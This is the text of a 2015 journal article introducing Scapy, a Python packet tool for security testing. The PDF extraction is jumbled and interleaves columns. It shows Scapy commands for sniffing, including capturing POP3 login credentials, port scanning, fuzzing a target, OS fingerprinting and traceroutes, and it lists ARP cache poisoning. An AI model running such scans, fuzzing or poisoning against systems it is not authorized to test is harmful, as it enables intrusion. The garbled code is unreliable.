ien r Sc ce & te S u y p s t m e o m
C s Journal of Bansal and Bansal, J Comput Sci Syst Biol 2015, 8:3 f
B
o
i l
o
a DOI: 10.4172/jcsb.1000182
l
o n
r
g
u y o
J Computer Science & Systems Biology ISSN: 0974-7230
Research Article Article OpenOpen Access Access Scapy–A Python Tool For Security Testing Shipra Bansal1* and Nitin Bansal2 1Department of Computer Applications, Lovely Professional University, Jalandhar, India 2Department of Management, Lovely Professional University, Jalandhar, India
Abstract Security Testing is the essential method of any information System and this method is used to detect flaws in the security measures in an Information System which protect the data from an unauthorized access. Passing through the Security testing method does not ensure that flaws are not present in the System. Python is a new emerging Programming language. This research paper looks into the tool named Scapy which is based on Python language; lists out some vital commands, explanation with examples and uses of Security Testing. This research paper, being introductory one tries to give a brief description and understandable usage of the security Testing tool.
Keywords: Security testing; Python; Scapy; Flaws Stackless is used for concurrency and PyPy has greater speed execution than CPython. Its extension is .py normally. Introduction Introduction to scapy Security is defined as “No unauthorized Access of information”. Security is very essential to maintain the integrity of System [1,2]. Scapy is a tool for manipulating interactive packets. This tool is Security Testing is the first step to detect flaws in the security measures totally based on Python language. Python is an easy to learn, powerful of System [3,4]. Security of System can be measured by following programming language [5,6]. It data structures are highly efficient and criteria: bases on object oriented Programming. Python’s syntax is simple and dynamic in nature, incorporated with feature of interpretation; make 1. Confidentiality: It defines certain rules and constraints to it an ideal language for scripting and rapid application development access any important information in many areas on most platforms. Scapy tool has the capability of encoding, decoding, sending, matching senders and receivers and 2. Integrity: Integrity means correctness of information. If the integrity of information is reserved then quality of information will many more [7,8]. Its interface is Python. Scapy tool is more powerful definitely increased. tools than firewalls. It can detect faults in the security systems that firewalls cannot detect. 3. Authentication: Authentication is the process of identifying identity of Person. This process is commonly done through username Scapy interactive sessions can be started by putting undersigned and password. command at the shell prompt: 4. Authorization: Authorization means access rights. Access $ sudo scapy Rights means whether user can read, write, and execute the file or Welcome to Scapy (2.0.1-dev) whether he has right to access the resource or not. >>: 5. Non-repudiation: In reference to digital security, non- repudiation means to ensure that a transferred message has been sent C:\>scapy by correct sender and received by correct receiver. This is done mainly INFO: No IPv6 support in kernel through digital certificates to ensure integrity of sender and receiver. WARNING: No route found for IPv6 destination :: (no default Security testing terminologies route?) 1. Unit Testing: Testing is the strategy to detect faults in Welcome to Scapy (2.0.1-dev) the System. Unit testing means testing each line in a component or modules. >>> 2. Functional Testing: Functional Testing is used to measure For example:- the quality of functional components of System. 3. System Testing: System Testing is used to measure the effectiveness and efficiency of whole System within real world *Corresponding author: Shipra Bansal, Department of Computer Applications, constraints. Lovely Professional University, Jalandhar, India, Tel: 9653450743; E-mail: [email protected]
Introduction to python Received January 26, 2015; Accepted March 30, 2015; Published March 31, 2015 Python is fast, reusable and micro threaded language. Its byte code generated is reusable in nature. That are 5 versions of Python Citation: Bansal S, Bansal N (2015) Scapy – A Python Tool For Security Testing. J are: CPyhton, Jython, IronPython, Stackless and PyPy. All versions Comput Sci Syst Biol 8: 140-159. doi:10.4172/jcsb.1000182 have their own different features. But the standard among all of them Copyright: © 2015 Bansal S, et al. This is an open-access article distributed under is CPython. Jython is python language with java byte code features, the terms of the Creative Commons Attribution License, which permits unrestricted use, distribution, and reproduction in any medium, provided the original author and IronPython is a Python language enables with dotnet framework, source are credited.
J Comput Sci Syst Biol ISSN: 0974-7230 JCSB, an open access journal Volume 8(3) 140-159 (2015) - 140 Citation: Bansal S, Bansal N (2015) Scapy – A Python Tool For Security Testing. J Comput Sci Syst Biol 8: 140-159. doi:10.4172/jcsb.1000182
#! /usr/bin/env python MAC,victim’s IP) couple import sys arping : Hosts which are alive sends ARP requests. from scapy.all import sr1,IP,ICMP bind_layers : Two Layers are binded on some p=sr1(IP(dst=sys.argv[1])/ICMP()) specific fields’ values if p: corrupt_bits : Sting get flipped by given percentage or number of bits corrupt_bytes : Sting get flipped by given p.show() percentage or number of bits This example demonstrates dissected return packets. This example defrag : defrag(plist) -> ([not fragmented], [defragmented], has taken a name or an IP addresses as a first parameter, sends an ICMP echo request and displays dissected packets. defragment : defrag(plist) -> plist defragmented as much as possible This tool is used to discover invalid frames, sent by a sender, injecting 802.11 frames and VLAN hopping. dyndns_add : DNS send a message specified by its name to a name server Some of the important commands of scapy: dyndns_del : DNS send a del message 1. Ls(): lists all supported protocol layers . specified by its name to a name server etherleak : Etherleak flaw is exploited 2. Lsc(): list all user commands fragment : Large size IP datagram is fragmented 3. Config: Configuration about object. fuzz : Transform a layer into a fuzzy For example: layer by replacing some default values by random objects Ls(): getmacbyip : Return MAC address 1. corresponding to a given IP address >>> from scapy.all import * hexdiff : Show differences between 2 WARNING: No route found for IPv6 destination :: (no default binary strings route?) hexdump : Coverts all dump formats into hexadecimal format >>> ls() hexedit : -Do- is_promisc : Try to ARP : ARP guess if target is in Promisc mode. The target is provided by its ip. ASN1_Packet : None linehexdump : Represent all dump material into line hexadecimal format BOOTP : BOOTP ls : List available layers, or infos on CookedLinux : cooked linux a given layer DHCP : DHCP options promiscping : Send ARP who-has requests to determine which hosts are in promiscuous mode DHCP6 : DHCPv6 Generic Message) rdpcap : Read a pcap file and return a DHCP6OptAuth : DHCP6 Option - Authentication packet list DHCP6OptBCMCSDomains : DHCP6 Option - BCMCS send : Send packets at layer 3 Domain Name List sendp : Send packets at layer 2 DHCP6OptBCMCSServers : DHCP6 Option - BCMCS sendpfast : Send packets at layer 2 using tc Addresses List preplay for performance DHCP6OptClientFQDN : DHCP6 Option - Client FQDN sniff : Sniff packets split_layers : Split 2 layers previously bound [7] DHCP6OptClientId : DHCP6 Client Identifier Option sr : Send and receive packets at layer 3 DHCP6OptDNSDomains : DHCP6 Option - Domain Search List option sr1 : Send packets at layer 3 and return only the first answer DHCP6OptDNSServers : DHCP6 Option - DNS Recursive srbt : Bluetooth is used for sending and Name Server receiving DHCP6OptElapsedTime : DHCP6 Elapsed Time Option srbt1 : Bluetooth socket is used for sending and receiving 1st packet DHCP6OptGeoConf : All the object list TCP: srflood : layer 3 is used for flooding and 2. Lsc(): receiving the packets. >>> lsc() srloop : Send a packet at layer 3 in loop and print the answer each time arpcachepoison : Poison target’s cache with (your
J Comput Sci Syst Biol ISSN: 0974-7230 JCSB, an open access journal Volume 8(3) 140-159 (2015) - 141 Citation: Bansal S, Bansal N (2015) Scapy – A Python Tool For Security Testing. J Comput Sci Syst Biol 8: 140-159. doi:10.4172/jcsb.1000182
srp : Layer 2 is used for sending and The basic features of sending and receiving packets should still receiving the packets work, though. srp1 : Send and receive packets at layer 2 Interactive tutorial: This section will show you several of Scapy’s and return only the first answer features. Just open a Scapy session as shown above and try the examples srpflood : Layer 2 is flooded by packets. yourself. srploop : Send a packet at layer 2 in loop First steps: Let’s build a packet and play with it: and print the answer each time >>> a=IP (ttl=10) traceroute : TCP is instantly trace route [9] tshark : pkt.show() is used to sniff and >>> a print the packets. < IP ttl=10 |> wireshark : It is used to run a list of packets >>> a.src wrpcap : pcap file contains a list of packets. ’127.0.0.1’ How scapy works >>> a.dst=”192.168.1.1” Scapy has some specific goals and these tools are made for it. There >>> a should be not any deviation from these goals. If different goals are < IP ttl=10 dst=192.168.1.1 |> needed from other tools, there is need to develop different applications in order to complete that needs. Other tools cannot differentiate >>> a.src sufficiently between encoding and decoding. Other tools are confused ’192.168.8.14’ in the sense that which machines are good for encoding and decoding. Even they do not able to decode sufficient information which they >>> del(a.ttl) receive. For instance, is there any tool that reports the padding? >>> a Scapy tries to overcome these problems. A flexible model that < IP dst=192.168.1.1 |> works in all arbitrary limits is Scapy. One is free to put any value that is required in any field and stack them as one wants. Infact when >>> a.ttl application needs are different for different applications and writing 64 code differently for different needs is totally waste of time, scapy can fulfill all the applications needs at same time. Interpretation power Stacking layers of scapy is very strong. It is able to interpret the information after decoding efficiently. The/operator has been used as a composition operator between two layers. When doing so, the lower layer can have one or more of its Usage defaults fields overloaded according to the upper layer. (You still can give the value you want). A string can be used as a raw layer. Starting scapy: Scapy’s interactive shell is run in a terminal session. Root privileges are needed to send the packets, so we’re using sudo here: >>> IP() $ sudo scapy
J Comput Sci Syst Biol ISSN: 0974-7230 JCSB, an open access journal Volume 8(3) 140-159 (2015) - 142 Citation: Bansal S, Bansal N (2015) Scapy – A Python Tool For Security Testing. J Comput Sci Syst Biol 8: 140-159. doi:10.4172/jcsb.1000182
Figure 1: Stacking layers.
‘E\x00\x00\x14\x00\x01\x00\x00@\x00|\xe7\x7f\x00\x00\x01\x7f\
J Comput Sci Syst Biol ISSN: 0974-7230 JCSB, an open access journal Volume 8(3) 140-159 (2015) - 143 Citation: Bansal S, Bansal N (2015) Scapy – A Python Tool For Security Testing. J Comput Sci Syst Biol 8: 140-159. doi:10.4172/jcsb.1000182
Figure 2: Graphical dumps.
Command Effect Command Effect str(pkt) assemble the packet summary() displays a list of summaries of each packet hexdump(pkt) have an hexadecimal dump nsummary() same as previous, with the packet number ls(pkt) have the list of fields values conversations() displays a graph of conversations pkt.summary() for a one-line summary show() displays the preferred representation (usually nsummary()) pkt.show() for a developed view of the packet filter() returns a packet list filtered with a lambda function same as show but on the assembled packet hexdump() returns a hexdump of all packets pkt.show2() (checksum is calculated, for instance) hexraw() returns a hexdump of the Raw layer of all packets pkt.sprintf() fills a format string with fields values of the packet padding() returns a hexdump of packets with padding pkt.decode_payload_as() changes the way the payload is decoded nzpadding() returns a hexdump of packets with non-zero padding pkt.psdump() draws a PostScript diagram with explained dissection plot() plots a lambda function applied to the packet list pkt.pdfdump() draws a PDF with explained dissection make table() displays a table according to a lambda function return a Scapy command that can generate the pkt.command() packet Table 2: Generating set of packets. Table 1: Graphical dumps. send them. The send() function will send packets at layer 3. That is to say it will handle routing and layer 2 for you. The sendp() function will
J Comput Sci Syst Biol ISSN: 0974-7230 JCSB, an open access journal Volume 8(3) 140-159 (2015) - 144 Citation: Bansal S, Bansal N (2015) Scapy – A Python Tool For Security Testing. J Comput Sci Syst Biol 8: 140-159. doi:10.4172/jcsb.1000182
>>> sendp(rdpcap(“/tmp/pcapfile”)) # tcpreplay proto = ICMP ...... chksum = 0x51dd Sent 11 packets. src = 66.35.250.151 Fuzzing dst = 192.168.5.21 The function fuzz() is able to change any default value that is not to options = ‘’ be calculated (like checksums) by an object whose value is random and ---[ ICMP ]--- whose type is adapted to the field. This enables to quickly built fuzzing templates and send them in loop. In the following example, the IP layer type = echo-reply is normal, and the UDP and NTP layers are fuzzed. The UDP checksum code = 0 will be correct, the UDP destination port will be overloaded by NTP to be 123 and the NTP version will be forced to be 4. All the other ports chksum = 0xee45 will be randomized: id = 0x0 >>> send(IP(dst=”target”)/fuzz(UDP()/NTP(version=4)),loop=1) seq = 0x0 ...... ^C ---[ Raw ]--- Sent 16 packets. load = ‘XXXXXXXXXXX’ Send and receive packets (sr) ---[ Padding ]--- Now, let’s try to do some fun things. The sr() function is for load = ‘\x00\x00\x00\x00’ sending packets and receiving answers. The function returns a couple of packet and answers, and the unanswered packets. The function sr1() A DNS query (rd = recursion desired). The host 192.168.5.1 is is a variant that only return one packet that answered the packet (or the my DNS server. Note the non-null padding coming from my Linksys packet set) sent. The packets must be layer 3 packets (IP, ARP, etc.). The having the Ether leak flaw: function srp() do the same for layer 2 packets (Ethernet, 802.3, etc.). >>> sr1(IP(dst=”192.168.5.1”)/UDP()/DNS(rd=1,qd=DNSQR(qname >>> p=sr1(IP(dst=”www.slashdot.org”)/ ICMP()/”XXXXXXXXXXX”) =”www.slashdot.org”))) Begin emission: Begin emission: ...Finished to send 1 packets. Finished to send 1 packets. .* ..* Received 5 packets, got 1 answers, remaining 0 packets Received 3 packets, got 1 answers, remaining 0 packets >>> p
J Comput Sci Syst Biol ISSN: 0974-7230 JCSB, an open access journal Volume 8(3) 140-159 (2015) - 145 Citation: Bansal S, Bansal N (2015) Scapy – A Python Tool For Security Testing. J Comput Sci Syst Biol 8: 140-159. doi:10.4172/jcsb.1000182
>>> ans,unans=_ J Comput Sci Syst Biol ISSN: 0974-7230 JCSB, an open access journal Volume 8(3) 140-159 (2015) - 146 Citation: Bansal S, Bansal N (2015) Scapy – A Python Tool For Security Testing. J Comput Sci Syst Biol 8: 140-159. doi:10.4172/jcsb.1000182 80 SA RA SA ... print snd.ttl, rcv.src, isinstance(rcv.payload, TCP) 443 SA SA SA ... The above example will even print the ICMP error type if the ICMP 5 194.51.159.65 0 packet was received as a response instead of expected TCP. 6 194.51.159.49 0 For larger scans, we could be interested in displaying only certain 4 194.250.107.181 0 responses. The example below will only display packets with the “SA” flag set: 7 193.251.126.34 0 >>> ans.nsummary(lfilter = lambda (s,r): r.sprintf(“%TCP.flags%”) 8 193.251.126.154 0 == “SA”) 9 193.251.241.89 0 0003 IP / TCP 192.168.1.100:ftp_data > 192.168.1.1:https S 10 193.251.241.110 0 ======> IP / TCP 192.168.1.1:https > 192.168.1.100:ftp_data SA 11 193.251.241.173 0 In case we want to do some expert analysis of responses, we can use the following command to indicate which ports are open: 13 208.172.251.165 0 >>> ans.summary(lfilter = lambda (s,r): r.sprintf(“%TCP.flags%”) 12 193.251.241.173 0 == “SA”,prn=lambda(s,r):r.sprintf(“%TCP.sport% is open”)) 14 208.172.251.165 0 https is open 15 206.24.226.99 0 Again, for larger scans we can build a table of open ports: 16 206.24.238.34 0 >>> ans.filter(lambda (s,r):TCP in r and r[TCP].flags&2).make_ table(lambda (s,r): 17 173.109.66.90 0 ... (s.dst, s.dport, “X”)) 18 173.109.88.218 0 66.35.250.150 192.168.1.1 216.109.112.135 19 173.29.39.101 1 80 X - X 20 173.29.39.101 1 443 X X X 21 173.29.39.101 1 If all of the above methods were not enough, Scapy includes a 22 173.29.39.101 1 report_ports() function which not only automates the SYN scan, but 23 173.29.39.101 1 also produces a LaTeX output with collected results: 24 173.29.39.101 1 >>> report_ports(“192.168.1.1”,(440,443)) Note that the TCP traceroute and some other high-level functions Begin emission: are already coded: ...*.**Finished to send 4 packets. >>> lsc() * sr : Send and receive packets at layer 3 Received 8 packets, got 4 answers, remaining 0 packets sr1 : Send packets at layer 3 and return only the first answer ‘\\begin{tabular}{|r|l|l|}\n\\hline\nhttps & open & SA \\\\\n\\hline\ srp : Send and receive packets at layer 2 n440 srp1 : Send and receive packets at layer 2 and return only the & closed & TCP RA \\\\\n441 & closed & TCP RA \\\\\n442 & first answer closed & srloop : Send a packet at layer 3 in loop and print the answer TCP RA \\\\\n\\hline\n\\hline\n\\end{tabular}\n’ each time TCP traceroute srploop : Send a packet at layer 2 in loop and print the answer each time A TCP traceroute: sniff : Sniff packets >>> ans,unans=sr(IP(dst=target, ttl=(4,25),id=RandShort())/ TCP(flags=0x2)) p0f : Passive OS fingerprinting: which OS emitted this TCP SYN ? *****.******.*.***..*.**Finished to send 22 packets. arpcachepoison : Poison target’s cache with (your MAC,victim’s ***...... IP) couple Received 33 packets, got 21 answers, remaining 1 packets send : Send packets at layer 3 >>> for snd,rcv in ans: sendp : Send packets at layer 2 J Comput Sci Syst Biol ISSN: 0974-7230 JCSB, an open access journal Volume 8(3) 140-159 (2015) - 147 Citation: Bansal S, Bansal N (2015) Scapy – A Python Tool For Security Testing. J Comput Sci Syst Biol 8: 140-159. doi:10.4172/jcsb.1000182 traceroute : Instant TCP traceroute x1b\x1c\x1d arping : Send ARP who-has requests to determine which hosts \x1e\x1f !\x22#$%&\’()*+,-./01234567’ |>>>> are up >>> sniff(iface=”wifi0”, prn=lambda x: x.summary()) ls : List available layers, or infos on a given layer 802.11 Management 8 ff:ff:ff:ff:ff:ff / 802.11 Beacon / Info SSID / lsc : List user commands Info Rates / Info DSset / Info TIM / Info 133 queso : Queso OS fingerprinting 802.11 Management 4 ff:ff:ff:ff:ff:ff / 802.11 Probe Request / Info SSID / Info Rates nmap_fp : nmap fingerprinting 802.11 Management 5 00:0a:41:ee:a5:50 / 802.11 Probe Response / report_ports : portscan a target and output a LaTeX table Info SSID / Info Rates / Info DSset / Info 133 dyndns_add : Send a DNS add message to a nameserver for 802.11 Management 4 ff:ff:ff:ff:ff:ff / 802.11 Probe Request / Info “name” to have a new “rdata” SSID / Info Rates dyndns_del : Send a DNS delete message to a nameserver for 802.11 Management 4 ff:ff:ff:ff:ff:ff / 802.11 Probe Request / Info “name” SSID / Info Rates [...] 802.11 Management 8 ff:ff:ff:ff:ff:ff / 802.11 Beacon / Info SSID / Configuring super sockets Info Rates / Info DSset / Info TIM / Info 133 The process of sending packets and receiving is quite complicated. 802.11 Management 11 00:07:50:d6:44:3f / 802.11 Authentication As I wanted to use the PF_PACKET interface to go through net filter, 802.11 Management 11 00:0a:41:ee:a5:50 / 802.11 Authentication I also needed to implement an ARP stack and ARP cache, and a LL stack. Well it seems to work, on ethernet and PPP interfaces, but I don’t 802.11 Management 0 00:07:50:d6:44:3f / 802.11 Association guarantee anything. Anyway, the fact I used a kind of super-socket Request / Info SSID / Info Rates / Info 133 / Info 149 for that mean that you can switch your IO layer very easily, and use 802.11 Management 1 00:0a:41:ee:a5:50 / 802.11 Association PF_INET/SOCK_RAW, or use PF_PACKET at level 2 (giving the LL Response / Info Rates / Info 133 / Info 149 header (ethernet,...) and giving yourself mac addresses, ...). I’ve just added a super socket which use libdnet and libpcap, so that it should 802.11 Management 8 ff:ff:ff:ff:ff:ff / 802.11 Beacon / Info SSID / be portable: Info Rates / Info DSset / Info TIM / Info 133 >>> conf.L3socket=L3dnetSocket 802.11 Management 8 ff:ff:ff:ff:ff:ff / 802.11 Beacon / Info SSID / Info Rates / Info DSset / Info TIM / Info 133 >>> conf.L3listen=L3pcapListenSocket 802.11 / LLC / SNAP / ARP who has 172.20.70.172 says Sniffing 172.20.70.171 / Padding We can easily capture some packets or even clone tcpdump 802.11 / LLC / SNAP / ARP is at 00:0a:b7:4b:9c:dd says 172.20.70.172 or tethereal. If no interface is given, sniffing will happen on every / Padding interfaces: 802.11 / LLC / SNAP / IP / ICMP echo-request 0 / Raw >>> sniff(filter=”icmp and host 66.35.250.151”, count=2) 802.11 / LLC / SNAP / IP / ICMP echo-reply 0 / Raw J Comput Sci Syst Biol ISSN: 0974-7230 JCSB, an open access journal Volume 8(3) 140-159 (2015) - 148 Citation: Bansal S, Bansal N (2015) Scapy – A Python Tool For Security Testing. J Comput Sci Syst Biol 8: 140-159. doi:10.4172/jcsb.1000182 ttl = 64 load = ‘B\xf7i\xa9\x00\x04\x149\x08\t\n\x0b\x0c\r\x0e\x0f\x10\ x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\ proto = ICMP x22#$%&\’()*+,-./01234567’ chksum = 0x3831 ---[ Padding ]--- src = 192.168.5.21 load = ‘\n_\x00\x0b’ dst = 66.35.250.151 For even more control over displayed information we can use the options = ‘’ sprintf() function: ---[ ICMP ]--- >>> pkts = sniff(prn=lambda x:x.sprintf(“{IP:%IP.src% -> %IP. dst%\n}{Raw:%Raw.load%\n}”)) type = echo-request 192.168.1.100 -> 64.233.167.99 code = 0 64.233.167.99 -> 192.168.1.100 = 0x89d9 192.168.1.100 -> 64.233.167.99 id = 0xc245 192.168.1.100 -> 64.233.167.99 seq = 0x0 ‘GET / HTTP/1.1\r\nHost: 64.233.167.99\r\nUser-Agent: ---[ Raw ]--- Mozilla/5.0 load = ‘B\xf7i\xa9\x00\x04\x149\x08\t\n\x0b\x0c\r\x0e\x0f\ (X11; U; Linux i686; en-US; rv:1.8.1.8) Gecko/20071022 x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f Ubuntu/7.10 (gutsy) !\x22#$%&\’()*+,-./01234567’ Firefox/2.0.0.8\r\nAccept: text/xml,application/xml,application/ ---[ Ethernet ]--- xhtml+xml, dst = 00:02:15:37:a2:44 text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept- src = 00:ae:f3:52:aa:d1 Language: type = 0x800 en-us,en;q=0.5\r\nAccept-Encoding: gzip,deflate\r\nAccept-Charset: ---[ IP ]--- ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nKeep-Alive: 300\r\ nConnection: version = 4L keep-alive\r\nCache-Control: max-age=0\r\n\r\n’ ihl = 5L We can sniff and do passive OS fingerprinting: tos = 0x0 >>> p len = 84 J Comput Sci Syst Biol ISSN: 0974-7230 JCSB, an open access journal Volume 8(3) 140-159 (2015) - 149 Citation: Bansal S, Bansal N (2015) Scapy – A Python Tool For Security Testing. J Comput Sci Syst Biol 8: 140-159. doi:10.4172/jcsb.1000182 (0.875, [‘Linux 2.4.2 - 2.4.14 (1)’, ‘Linux 2.4.10 (1)’, ‘Windows 98 (?)’]) IP / TCP 192.168.8.14:20 > 192.168.11.98:80 S (1.0, [‘Windows 2000 (9)’]) IP / TCP 192.168.8.14:20 > 192.168.11.97:80 S The number before the OS guess is the accurracy of the guess. RECV 1: Ether / IP / TCP 192.168.11.99:80 > 192.168.8.14:20 SA / Padding Filters fail 3: IP / TCP 192.168.8.14:20 > 192.168.11.96:80 S Demo of both bpf filter and sprintf() method: IP / TCP 192.168.8.14:20 > 192.168.11.98:80 S >>> a=sniff(filter=”tcp and ( port 25 or port 110 )”, IP / TCP 192.168.8.14:20 > 192.168.11.97:80 S prn=lambda x: x.sprintf(“%IP.src%:%TCP.sport% -> %IP. dst%:%TCP.dport% %2s,TCP.flags% : %TCP.payload%”)) Importing and Exporting Data 192.168.8.10:47226 -> 213.228.0.14:110 S : PCAP: It is often useful to save capture packets to pcap file for use at later time or with different applications: 213.228.0.14:110 -> 192.168.8.10:47226 SA : >>> wrpcap(“temp.cap”,pkts) 192.168.8.10:47226 -> 213.228.0.14:110 A : To restore previously saved pcap file: 213.228.0.14:110 -> 192.168.8.10:47226 PA : +OK <[email protected]> >>> pkts = rdpcap(“temp.cap”) 192.168.8.10:47226 -> 213.228.0.14:110 A : or 192.168.8.10:47226 -> 213.228.0.14:110 PA : USER toto >>> pkts = sniff(offline=”temp.cap”) 213.228.0.14:110 -> 192.168.8.10:47226 A : Hexdump: Scapy allows you to export recorded packets in various hex formats. 213.228.0.14:110 -> 192.168.8.10:47226 PA : +OK Use hexdump() to display one or more packets using classic 192.168.8.10:47226 -> 213.228.0.14:110 A : hexdump format: 192.168.8.10:47226 -> 213.228.0.14:110 PA : PASS tata >>> hexdump(pkt) 213.228.0.14:110 -> 192.168.8.10:47226 PA : -ERR authorization failed 0000 00 50 56 FC CE 50 00 0C 29 2B 53 19 08 00 45 00 .PV..P..)+S...E. 192.168.8.10:47226 -> 213.228.0.14:110 A : 0010 00 54 00 00 40 00 40 01 5A 7C C0 A8 19 82 04 02 .T..@[email protected]|...... 213.228.0.14:110 -> 192.168.8.10:47226 FA : 0020 02 01 08 00 9C 90 5A 61 00 01 E6 DA 70 49 B6 E5 ...... Za....pI.. 192.168.8.10:47226 -> 213.228.0.14:110 FA : 0030 08 00 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 ...... 213.228.0.14:110 -> 192.168.8.10:47226 A : 0040 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25 ...... !”#$% Send and receive in a loop 0050 26 27 28 29 2A 2B 2C 2D 2E 2F 30 31 32 33 34 35 &’()*+,- Here is an example of a (h)ping-like functionality : you always send ./012345 the same set of packets to see if something change: 0060 36 37 67 >>> srloop(IP(dst=”www.target.com/30”)/TCP()) Hexdump above can be reimported back into Scapy using import_ RECV 1: Ether / IP / TCP 192.168.11.99:80 > 192.168.8.14:20 SA / hexcap(): Padding >>> pkt_hex = Ether(import_hexcap()) fail 3: IP / TCP 192.168.8.14:20 > 192.168.11.96:80 S 0000 00 50 56 FC CE 50 00 0C 29 2B 53 19 08 00 45 00 .PV..P..)+S...E. IP / TCP 192.168.8.14:20 > 192.168.11.98:80 S 0010 00 54 00 00 40 00 40 01 5A 7C C0 A8 19 82 04 02 .T..@[email protected]|...... IP / TCP 192.168.8.14:20 > 192.168.11.97:80 S 0020 02 01 08 00 9C 90 5A 61 00 01 E6 DA 70 49 B6 E5 ...... Za....pI.. RECV 1: Ether / IP / TCP 192.168.11.99:80 > 192.168.8.14:20 SA / 0030 08 00 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 ...... Padding 0040 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25 ...... !”#$% fail 3: IP / TCP 192.168.8.14:20 > 192.168.11.96:80 S 0050 26 27 28 29 2A 2B 2C 2D 2E 2F 30 31 32 33 34 35 &’()*+,- IP / TCP 192.168.8.14:20 > 192.168.11.98:80 S ./012345 IP / TCP 192.168.8.14:20 > 192.168.11.97:80 S 0060 36 37 67 RECV 1: Ether / IP / TCP 192.168.11.99:80 > 192.168.8.14:20 SA / >>> pkt_hex Padding J Comput Sci Syst Biol ISSN: 0974-7230 JCSB, an open access journal Volume 8(3) 140-159 (2015) - 150 Citation: Bansal S, Bansal N (2015) Scapy – A Python Tool For Security Testing. J Comput Sci Syst Biol 8: 140-159. doi:10.4172/jcsb.1000182 ihl=5L tos=0x0 len=84 id=0 flags=DF frag=0L ttl=64 proto=icmp xe5\x08\x00\x08\t\n chksum=0x5a7c \x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\ src=192.168.25.130 dst=4.2.2.1 options=’’ | J Comput Sci Syst Biol ISSN: 0974-7230 JCSB, an open access journal Volume 8(3) 140-159 (2015) - 151 Citation: Bansal S, Bansal N (2015) Scapy – A Python Tool For Security Testing. J Comput Sci Syst Biol 8: 140-159. doi:10.4172/jcsb.1000182 xe5\x08\x00\x08\t\n >>> ans.make_table(lambda (s,r): (s.dst, s.dport, r.sprintf(“%IP.id%”))) \x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\ 172.20.80.196 172.20.80.197 172.20.80.198 172.20.80.200 x1a\x1b\x1c\x1d\x1e\x1f 172.20.80.201 !”#$%&\’()*+,-./01234567’ |>>>> 20 0 4203 7021 - 11562 Sessions: At last Scapy is capable of saving all session variables us- 21 0 4204 7022 - 11563 ing the save_session() function: 22 0 4205 7023 11561 11564 >>> dir() 25 0 0 7024 - 11565 [‘__builtins__’, ‘conf’, ‘new_pkt’, ‘pkt’, ‘pkt_export’, ‘pkt_hex’, 53 0 4207 7025 - 11566 ‘pkt_str’, ‘pkts’] 80 0 4028 7026 - 11567 >>> save_session(“session.scapy”) It can help identify network topologies very easily when playing Next time you start Scapy you can load the previous saved session with TTL, displaying received TTL, etc. using the load_session() command: >>> dir() Routing [‘__builtins__’, ‘conf’] Now scapy has its own routing table, so that you can have your packets routed diffrently than the system: >>> load_session(“session.scapy”) >>> conf.route >>> dir() Network Netmask Gateway Iface [‘__builtins__’, ‘conf’, ‘new_pkt’, ‘pkt’, ‘pkt_export’, ‘pkt_hex’, ‘pkt_str’, ‘pkts’] 127.0.0.0 255.0.0.0 0.0.0.0 lo Making tables 192.168.8.0 255.255.255.0 0.0.0.0 eth0 0.0.0.0 0.0.0.0 192.168.8.1 eth0 Now we have a demonstration of the make_table() presentation function. It takes a list as parameter, and a function who returns a >>> conf.route.delt(net=”0.0.0.0/0”,gw=”192.168.8.1”) 3-uple. The first element is the value on the x axis from an element of >>> conf.route.add(net=”0.0.0.0/0”,gw=”192.168.8.254”) the list, the second is about the y value and the third is the value that we want to see at coordinates (x,y). The result is a table. This function has 2 >>> conf.route.add(host=”192.168.1.1”,gw=”192.168.8.1”) variants, make_lined_table() and make_tex_table() to copy/paste into your LaTeX pentest report. Those functions are available as methods >>> conf.route of a result object : Network Netmask Gateway Iface Here we can see a multi-parallel traceroute (scapy already has a 127.0.0.0 255.0.0.0 0.0.0.0 lo multi TCP traceroute function. See later): 192.168.8.0 255.255.255.0 0.0.0.0 eth0 >>> ans,unans=sr(IP(dst=”www.test.fr/30”, ttl=(1,6))/TCP()) 0.0.0.0 0.0.0.0 192.168.8.254 eth0 Received 49 packets, got 24 answers, remaining 0 packets 192.168.1.1 255.255.255.255 192.168.8.1 eth0 >>> ans.make_table( lambda (s,r): (s.dst, s.ttl, r.src) ) >>> conf.route.resync() 216.15.189.192 216.15.189.193 216.15.189.194 216.15.189.195 >>> conf.route 1 192.168.8.1 192.168.8.1 192.168.8.1 192.168.8.1 Network Netmask Gateway Iface 2 81.57.239.254 81.57.239.254 81.57.239.254 81.57.239.254 127.0.0.0 255.0.0.0 0.0.0.0 lo 3 213.228.4.254 213.228.4.254 213.228.4.254 213.228.4.254 192.168.8.0 255.255.255.0 0.0.0.0 eth0 4 213.228.3.3 213.228.3.3 213.228.3.3 213.228.3.3 0.0.0.0 0.0.0.0 192.168.8.1 eth0 5 193.251.254.1 193.251.251.69 193.251.254.1 193.251.251.69 Gnuplot 6 193.251.241.174 193.251.241.178 193.251.241.174 193.251.241.178 We can easily plot some harvested values using Gnuplot. (Make Here is a more complex example to identify machines from their sure that you have Gnuplot-py and Gnuplot installed.) For example, we IPID field. We can see that 172.20.80.200:22 is answered by the same IP can observe the IP ID patterns to know how many distinct IP stacks are stack than 172.20.80.201 and that 172.20.80.197:25 is not answered by used behind a load balancer (Figure 3): the sape IP stack than other ports on the same IP. >>> a,b=sr(IP(dst=”www.target.com”)/TCP(sport=[RandShort()]*1000)) >>> ans,unans=sr(IP(dst=”172.20.80.192/28”)/ TCP(dport=[20,21,22,25,53,80])) >>> a.plot(lambda x:x[1].id) Received 142 packets, got 25 answers, remaining 71 packets J Comput Sci Syst Biol ISSN: 0974-7230 JCSB, an open access journal Volume 8(3) 140-159 (2015) - 152 Citation: Bansal S, Bansal N (2015) Scapy – A Python Tool For Security Testing. J Comput Sci Syst Biol 8: 140-159. doi:10.4172/jcsb.1000182 70000 60000 50000 40000 30000 20000 10000 0 0 100 200 300 400 500 600 700 800 900 1000 Figure 3: 